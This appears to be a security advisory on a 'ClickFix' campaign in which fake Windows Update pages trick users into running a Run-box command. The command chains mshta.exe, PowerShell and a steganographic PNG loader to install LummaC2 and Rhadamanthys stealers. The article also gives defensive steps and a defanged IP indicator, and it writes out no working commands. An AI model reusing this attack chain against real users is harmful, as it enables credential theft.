Attackers are using convincing fake Windows Update screens to trick people into running commands that install password stealing malware. The tactic, known as "ClickFix", is a common initial access method, and turns simple social engineering into a multistage, file-light infection chain.
The latest technique, observed by Huntress analysts, involves a website coercing victims into pressing keyboard shortcuts after displaying an imitation of a full-screen blue Windows Update-style page with realistic progress messages. When the fake update finishes, it instructs users to open the Run box and execute a “critical security update” command.
In cases analysed, the final payload delivered two well-known information-stealing malware strains, LummaC2 and Rhadamanthys, which specialise in grabbing login credentials and other sensitive data from the victim’s machine.
While the hoax site’s source code included comments in Russian, attribution is still unclear. Parts of the infrastructure used in these attacks have now been disrupted as part of “Operation Endgame 3.0” - a law-enforcement action that disrupted Rhadamanthys’ infrastructure in mid-November - however multiple domains are still hosting the lure.
Why does this matter?
A special feature of the latest campaign observed is the use of steganography - the practice of hiding data inside another file or medium - to conceal the malicious code; attackers do not simply process the malicious code as an addition to an existing file, but instead place pieces of the payload in the pixel structure of PNG images.
The command typically starts a built-in Windows tool called mshta.exe; this tool runs small HTML-based applications, which can be easily abused by threat actors, as it blends with legitimate Windows behaviour. Next, the attack downloads and runs both PowerShell and .NET components, leaning heavily on trusted “living off the land” binaries.
The final stage is a “steganographic loader”. The loader reads the image’s raw bytes and reconstructs the hidden payload in memory, injecting it into a normal Windows process. This tactic helps the malicious code evade signature based detection.
What can I do?
ClickFix relies heavily on human interaction, and steganography enables these payloads to bypass signature-based detection and make analysis more difficult. While the combination of these two techniques is effective at getting past both conventional and automated security solutions through the leveraging native Windows features, implementing basic measures and providing clear guidance to staff can significantly reduce the risk of social engineering attacks leading to data breaches. Recommendations include:
- Break the attack chain: This attack hinges on user interaction with the "Run" dialog box in Windows. As such, a strong mitigation would be to disable this functionality via Group Policy or registry settings.
- Educate users: Reinforce that neither CAPTCHA checks nor Windows Update will ever ask you to paste commands from a web page into the Run prompt.
- Watch for suspicious activity: Endpoint Detection and Response (EDR) tools can alert when explorer.exe unexpectedly starts mshta.exe, PowerShell, or other scripting tools with odd command lines. On the telemetry side, analysts noted the repeated use of 141[.]98[.]80[.]175 - as such, it would be recommended to monitor/restrict any traffic to or from that address.
- Investigate the registry: For responders, Windows stores a history of Runbox commands in the “RunMRU” registry key; reviewing this data can confirm whether a user ran a ClickFix command.